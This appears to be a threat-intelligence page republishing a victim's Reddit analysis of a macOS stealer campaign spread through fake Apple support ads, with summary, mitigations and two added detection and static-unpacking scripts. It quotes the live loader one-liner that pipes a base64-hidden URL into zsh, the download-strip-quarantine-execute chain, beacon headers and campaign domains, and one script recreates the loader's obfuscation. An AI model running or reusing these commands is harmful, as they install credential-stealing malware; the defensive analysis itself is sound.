Not a security person... got hit by an undocumented macOS stealer campaign, reverse engineered it, and tried to take the whole operation down.
A macOS stealer campaign was discovered by a non-security professional who was tricked into running a malicious terminal command from a fake Apple support website reached through a Google Ad. The command fetched and executed obfuscated scripts that ultimately tried to download and run a binary the post describes as a browser-credential stealer. The victim reports that the attack stopped when they denied a Finder access permission prompt. The campaign uses separate domains for phishing, victim tracking and payload delivery; the payload domain was registered two days before the observed attack. No sample of the final binary was obtained, and the campaign was not documented elsewhere at the time of posting.
AI Analysis
Technical Summary
This threat is a macOS credential-stealing campaign that starts with a terminal command copied from a phishing site (clearspark28.com) mimicking Apple's support page, reached via a Google Ad shown for the query "low disk space mac". The one-liner prints a fake support.apple.com URL as a decoy, then fetches the real script from a base64-hidden URL on cedar-satin.com and pipes it straight into zsh. That script is mostly junk padding (fake variables, meaningless loops) around a gzip-compressed, base64-encoded blob; the blob is decoded and executed with eval, and its real commands are hidden as octal-escaped strings. Once decoded, the script first fires a tracking beacon to amber-22.com carrying per-victim "user" and "BuildID" headers, then downloads a helper binary to /tmp/helper, strips its extended attributes with xattr -c (removing any quarantine flag Gatekeeper would act on), marks it executable and runs it. The post describes the helper as a browser credential stealer, but the binary was never recovered; the victim reports that a Finder access permission prompt appeared at this stage, that they denied it, and that nothing further happened. Only the loader stages avoid the disk; the final binary is written to /tmp. cedar-satin.com was registered on May 24, 2026, two days before the observed attack, with Cloudflare nameservers.
Potential Impact
If the helper binary runs, passwords saved in browsers on the infected Mac could be exfiltrated. The loader stages run with the victim's user privileges the moment the command is pasted, and the beacon reports the execution to the operator, so even a halted infection has already disclosed the victim's IP address and a build identifier to the attacker. Credential theft requires the final binary to execute, which the victim reports was prevented in this case; because the binary was never recovered, its full capability is unknown. The campaign is active and uses paid Google Ads, so it reaches macOS users who are actively searching for disk-cleanup help rather than waiting for them to stumble onto a malicious site.
Mitigation Recommendations
The Finder access prompt appears only after the loader has already run, so denying it is a last line of defense rather than a control to rely on: by then the beacon has fired and the script has executed with the user's privileges. Anyone who pasted the command should treat the machine as compromised: check for /tmp/helper and other recently created files in /tmp, review the shell history for the command, look for persistence, and rotate passwords saved in browsers as a precaution. Users should never paste terminal commands offered by a website, particularly one reached through an ad, and should be suspicious of any command that pipes curl output into a shell or hides a URL inside echo ... | base64 -d. No vendor advisory or patch exists because nothing is exploited except the user; rely on endpoint protection that inspects scripts launched from Terminal and on blocking or alerting on connections to clearspark28.com, amber-22.com and cedar-satin.com. Sharing the beacon headers and the cleaner3/update path with threat-intel feeds, reporting the ad to Google, and reporting the domains to their hosts (the post lists the abuse contacts) helps shorten the campaign's life.
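The monitoring advice above is easier to act on with concrete rules. The following is an added example written for this page, not code from the post or from any vendor: it runs three triage checks over constructed sample data (command lines as they could be recovered from ~/.zsh_history or a decoded script, and a proxy-style connection log whose format, client address and timestamps are assumptions). The checks flag a base64-hidden URL fetched and piped into a shell (reporting the real host next to the decoy URL printed by the preceding echo), the xattr -c / chmod +x / execute chain on a /tmp path, and any contact with the three campaign domains.

```python
"""Triage checks for the paste-a-command chain described in the post, run over
constructed sample data. Nothing here executes the commands it inspects."""
import base64
import re

IOC_DOMAINS = {"clearspark28.com", "amber-22.com", "cedar-satin.com"}

# Constructed command history. Line 3 is the one-liner quoted in the post;
# line 5 is the second-stage chain it eventually runs ([path] left as the post has it).
SAMPLE_COMMANDS = "\n".join([
    "ls -la ~/Downloads",
    "df -h",
    'echo "Downloading Update: https://support.apple.com/storage/cleanup-2.3.15" && '
    'curl -s $(echo "aHR0cHM6Ly9jZWRhci1zYXRpbi5jb20vY3VybC8xZmFjMThmNDc2MjIzNGE0M2Y2'
    'NWFkNWMyNzQxOWM3MzdlZDBlYWYxNDA4Yzg3NTRkMjhiMWUwMzI5NDg4NmNi" | openssl base64 -d -A) | zsh',
    "git status",
    "curl -o /tmp/helper https://cedar-satin.com/[path]/cleaner3/update "
    "&& xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper",
    "brew update",
])

# Constructed proxy-style log (assumed format): timestamp, client, host, path.
SAMPLE_NETLOG = "\n".join([
    "2026-05-26T21:14:02Z 10.0.0.12 www.google.com /search?q=low+disk+space+mac",
    "2026-05-26T21:14:09Z 10.0.0.12 clearspark28.com /",
    "2026-05-26T21:15:31Z 10.0.0.12 cedar-satin.com /curl/1fac18f4762234a43f65ad5c27419c737ed0eaf1408c8754d28b1e03294886cb",
    "2026-05-26T21:15:32Z 10.0.0.12 amber-22.com /api/metrics/run?event=pasted",
])

_DECODE_PIPE = re.compile(
    r"\$\(\s*echo\s+[\"']?([A-Za-z0-9+/=]+)[\"']?\s*\|\s*"
    r"(?:openssl\s+base64\s+-d|base64\s+(?:-d|-D|--decode))[^)]*\)")
_SHELL_SINK = re.compile(r"\|\s*(?:zsh|bash|sh)\b")
_ECHO_URL = re.compile(r"echo\s+\"[^\"]*?(https?://[^\s\"]+)")
_XATTR = re.compile(r"xattr\s+(?:-c|-d\s+com\.apple\.quarantine)\s+(\S+)")
_CHMOD = re.compile(r"chmod\s+\+x\s+(\S+)")


def host_of(url):
    return re.sub(r"^https?://", "", url).split("/")[0]


def check_hidden_fetch(cmd):
    """Flag `... $(echo <b64> | base64 -d) | zsh` lines; surface decoy vs. real host."""
    if not _SHELL_SINK.search(cmd):
        return None
    m = _DECODE_PIPE.search(cmd)
    if not m:
        return None
    try:
        real = base64.b64decode(m.group(1)).decode()
    except ValueError:
        return None
    if not real.startswith(("http://", "https://")):
        return None
    decoy = _ECHO_URL.search(cmd)
    return {"rule": "hidden-url-piped-to-shell", "real_host": host_of(real),
            "decoy_host": host_of(decoy.group(1)) if decoy else None,
            "known_ioc": host_of(real) in IOC_DOMAINS}


def check_quarantine_strip(cmd):
    """Flag lines that strip xattrs from a file, mark it executable and run it."""
    x = _XATTR.search(cmd)
    if not x:
        return None
    path = x.group(1)
    c = _CHMOD.search(cmd)
    return {"rule": "quarantine-strip-then-exec", "path": path,
            "downloaded": re.search(r"-o\s+" + re.escape(path), cmd) is not None,
            "chmod": c is not None and c.group(1) == path,
            "executed": re.search(r"(?:&&|;|\|\||^)\s*" + re.escape(path) + r"(?:\s|$)", cmd) is not None}


def check_netlog(log):
    """Every log line whose host is one of the campaign domains."""
    hits = []
    for line in log.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[2].lower() in IOC_DOMAINS:
            hits.append({"rule": "ioc-domain-contact", "ts": parts[0],
                         "client": parts[1], "host": parts[2], "path": parts[3]})
    return hits


def triage(commands, netlog):
    findings = []
    for n, cmd in enumerate(commands.splitlines(), 1):
        for check in (check_hidden_fetch, check_quarantine_strip):
            f = check(cmd)
            if f:
                f["line"] = n
                findings.append(f)
    findings.extend(check_netlog(netlog))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_COMMANDS, SAMPLE_NETLOG):
        print(f)
```

The decoy/real host comparison is the most useful signal here: a command that prints one domain and fetches from another is almost never legitimate. A plain `curl ... | sh` rule without the base64 indirection is the obvious complement and is deliberately not folded into the first check so that the two can be tuned separately.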
Reddit Discussion
DISCLAIMER: I'm a biochem student with no cybersecurity background. Tonight I got tricked into running a malicious terminal command I found via a Google Ad. I spent the next 3 hours with Claude AI trying to figure out exactly what happened. Posting because nobody has documented this campaign yet; this is also my first post on this subreddit, so I apologize beforehand... Code samples are posted for research purposes only. Do not execute anything in this post.
First!
My disk space was low on my Mac, so I searched on Google "low disk space mac". I clicked the first thing, and it was actually a Google Ad that led to clearspark28.com, which was a pixel-perfect clone of Apple's support website, fake Apple copyright footer and all. It told me to paste a command into Terminal to "clean up disk space." I pasted it. The moment I hit enter I knew something was wrong (too good to be true). I know, in hindsight that was so damn obvious, but I was distracted at the time...
THE COMMAND:
```shell
echo "Downloading Update: https://support.apple.com/storage/cleanup-2.3.15" && curl -s $(echo "aHR0cHM6Ly9jZWRhci1zYXRpbi5jb20vY3VybC8xZmFjMThmNDc2MjIzNGE0M2Y2NWFkNWMyNzQxOWM3MzdlZDBlYWYxNDA4Yzg3NTRkMjhiMWUwMzI5NDg4NmNi" | openssl base64 -d -A) | zsh
```
The fake Apple URL is just text printed to the screen.
The real URL is base64 encoded and hidden, it points to cedar-satin.com.
macOS showed a permission prompt asking for Finder access. I denied it. I think that stopped the attack.
Downloading the script without executing it revealed:
- Mostly junk padding (fake variables, meaningless loops)
- A gzip compressed, base64 encoded hidden payload
- Everything executed via eval so it never touches disk
Decompressing the payload revealed octal encoded strings hiding all the real commands.
Tracking beacon (fires immediately on execution): https://amber-22.com/api/metrics/run?event=pasted
With headers:
user: AxkPZnSWtzN7LfXvNn7o_H6WDDJ-oCP5b2gqZVITruE
BuildID: a5m2yvGoDVLVNY7hEYjAz0Dksst8zgbvil3Vx-s3rQs
Second stage download and execution:
```shell
curl -o /tmp/helper https://cedar-satin.com/[path]/cleaner3/update \
  && xattr -c /tmp/helper \
  && chmod +x /tmp/helper \
  && /tmp/helper
```
The binary was intended to steal browser credentials. It never executed because Finder access was denied.
clearspark28.com: fake Apple phishing page (Host: FEMOIT, GB (abuse@as214351.com))
amber-22.com: victim tracking beacon (Host: Limited Network LTD, Romania (abuse@btcloud.ro))
cedar-satin.com: malware payload server
cedar-satin.com was registered: May 24, 2026
Attack observed: May 26, 2026
Registrant: Maxwell Nguyen
Address: 62 W 7th Street Apt 56, Fort Worth TX 76102 (almost certainly fake)
Nameservers: Cloudflare
The initial attack vector was a paid Google Ad (Campaign ID: 23886301396).
This means someone paid Google with a real payment method to target people searching for Mac storage help.
WHAT I COULDN'T GET:
The actual /tmp/helper binary, it was never written to disk on my machine so I have no sample to analyze. If anyone recognizes this infrastructure, the beacon headers, or the cleaner3/update path, please comment. I'd love to know what the binary actually does and who is behind this. Happy to answer any questions or provide additional details!
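The post's description of the loader (a base64-hidden URL in the one-liner, then junk padding around a gzip-compressed, base64-encoded blob that eval runs, with the real commands stored as octal-escaped strings) can be unpacked statically, without ever executing anything. The block below is an added example written for this page, not the poster's code and not the actual script from cedar-satin.com: the stage-0 one-liner is the real one quoted above, but the stage-2 text is a constructed stand-in that reproduces the same layering around the beacon and second-stage commands the post lists (with the elided [path] kept as the post has it). The regexes, the helper names and the exact padding are assumptions.

```python
"""Static unpacking of the two-stage loader: recover the URL hidden in the
stage-0 one-liner, peel the base64+gzip wrapper off the stage-2 script, decode
its octal-escaped strings, and list the indicators. No shell code is run."""
import base64
import gzip
import re

IOC_DOMAINS = {"clearspark28.com", "amber-22.com", "cedar-satin.com"}

# Stage 0: the one-liner quoted in the post (parsed only, never executed).
STAGE0 = (
    'echo "Downloading Update: https://support.apple.com/storage/cleanup-2.3.15" && '
    'curl -s $(echo "aHR0cHM6Ly9jZWRhci1zYXRpbi5jb20vY3VybC8xZmFjMThmNDc2MjIzNGE0M2Y2'
    'NWFkNWMyNzQxOWM3MzdlZDBlYWYxNDA4Yzg3NTRkMjhiMWUwMzI5NDg4NmNi" | openssl base64 -d -A) | zsh'
)

# Constructed plaintext of what the loader finally evals, modelled on the beacon
# and second-stage commands the post lists.
REAL_PAYLOAD = (
    'curl -s -H "user: AxkPZnSWtzN7LfXvNn7o_H6WDDJ-oCP5b2gqZVITruE" '
    '-H "BuildID: a5m2yvGoDVLVNY7hEYjAz0Dksst8zgbvil3Vx-s3rQs" '
    '"https://amber-22.com/api/metrics/run?event=pasted" >/dev/null\n'
    'curl -o /tmp/helper "https://cedar-satin.com/[path]/cleaner3/update" '
    '&& xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper\n'
)


def build_constructed_stage2(payload=REAL_PAYLOAD):
    """Re-create the loader's layering: octal-escape the real commands, wrap them
    in printf, gzip + base64 the result, and bury the blob in junk that evals it."""
    octal = "".join("\\%03o" % b for b in payload.encode())
    inner = "eval \"$(printf '" + octal + "')\"\n"
    blob = base64.b64encode(gzip.compress(inner.encode())).decode()
    return (
        "#!/bin/zsh\n"
        "_x=0; for _i in 1 2 3; do _x=$((_x+_i)); done   # junk padding\n"
        '_unused="ZmFrZSB2YXJpYWJsZQ=="\n'
        '_p="' + blob + '"\n'
        'eval "$(echo "$_p" | base64 -d | gunzip)"\n'
    )


SAMPLE_STAGE2 = build_constructed_stage2()

_B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
_OCT_RE = re.compile(r"\\([0-7]{1,3})")
_URL_RE = re.compile(r"https?://[^\s\"'\\]+")
_HDR_RE = re.compile(r"-H\s+[\"']([A-Za-z-]+):\s*([^\"']+)[\"']")
_OUT_RE = re.compile(r"-o\s+(/\S+)")


def decode_stage0(command):
    """URLs hidden in $(echo "<b64>" | openssl base64 -d ...) substitutions."""
    return [base64.b64decode(b).decode() for b in
            re.findall(r'echo\s+"([A-Za-z0-9+/=]+)"\s*\|\s*openssl\s+base64\s+-d', command)]


def unwrap_gzip_b64(script):
    """Decode every long base64 run in the script; keep the ones that are gzip."""
    found = []
    for blob in _B64_RE.findall(script):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:
            continue
        if raw[:2] == b"\x1f\x8b":  # gzip magic
            found.append(gzip.decompress(raw).decode("utf-8", "replace"))
    return "\n".join(found)


def decode_octal(text):
    """Turn printf-style \\ooo escapes back into characters (up to 3 octal digits, as the shell does)."""
    return _OCT_RE.sub(lambda m: chr(int(m.group(1), 8)), text)


def analyze(stage0, stage2):
    hidden = decode_stage0(stage0)
    payload = decode_octal(unwrap_gzip_b64(stage2))
    urls = hidden + _URL_RE.findall(payload)
    domains = {re.sub(r"^https?://", "", u).split("/")[0] for u in urls}
    return {
        "stage0_hidden_urls": hidden,
        "decoded_payload": payload,
        "urls": urls,
        "known_domains": sorted(domains & IOC_DOMAINS),
        "headers": dict(_HDR_RE.findall(payload)),
        "dropped_files": _OUT_RE.findall(payload),
    }


if __name__ == "__main__":
    result = analyze(STAGE0, SAMPLE_STAGE2)
    for key in ("stage0_hidden_urls", "known_domains", "headers", "dropped_files"):
        print(key, result[key])
    print(result["decoded_payload"])
```

Run against a real downloaded script, `analyze` is fed the file's text; the gzip magic check is what separates the packed payload from decoy base64 variables, and decoding the octal escapes before the URL and header regexes run is what makes the beacon, the second-stage URL and the /tmp/helper drop visible, since none of them appear as plain text in the packed file.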
Technical Details
- Source Type: Subreddit
- Subreddit: Malware
- Reddit Score: 0
- Discussion Level: minimal
- Content Source: reddit_link_post
- Post Type: link
Threat ID: 6a15d914891d628fdc63fb7e
Added to database: 5/26/2026, 5:32:04 PM
Last enriched: 5/26/2026, 5:32:54 PM
Last updated: 5/26/2026, 8:57:35 PM